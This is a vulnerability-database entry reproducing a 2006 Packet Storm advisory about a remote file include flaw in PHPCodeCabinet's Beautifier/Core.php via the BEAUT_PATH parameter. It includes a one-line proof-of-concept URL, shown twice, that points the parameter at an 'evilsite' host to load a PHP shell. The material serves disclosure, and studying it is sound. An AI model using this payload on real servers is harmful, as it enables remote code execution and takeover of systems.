Lucene search
PHPCodeCabinet.txt
๐๏ธย 18 Aug 2006ย 00:00:00Reported byย MinionTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 19ย Views
PHPCodeCabinet vulnerable to remote file include in /include/Beautifier/Core.ph
Show more
`------=_Part_44842_31893622.1154733732400
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
>>From Minion:
PHPCodeCabinet (all versions) is vulnerable to a remote file include.
The vulnerable code is in /include/Beautifier/Core.php
an $BEAUT_PATH Was not properly scrubbed, so they got owned.
Proof of concept:
*target phpcodecabinet
directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php
HFile.php would be your php shell.
Shouts to XoRcrew & Disruptiv.
------=_Part_44842_31893622.1154733732400
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
>>From Minion:<br><br>PHPCodeCabinet (all versions) is vulnerable to a remote file include.<br><br>The vulnerable code is in /include/Beautifier/Core.php<br><br>an $BEAUT_PATH Was not properly scrubbed, so they got owned.<br>
<br>Proof of concept:<br><br>*target phpcodecabinet directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php<br><br>HFile.php would be your php shell.<br><br>Shouts to XoRcrew & Disruptiv.<br>
------=_Part_44842_31893622.1154733732400--
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo18 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4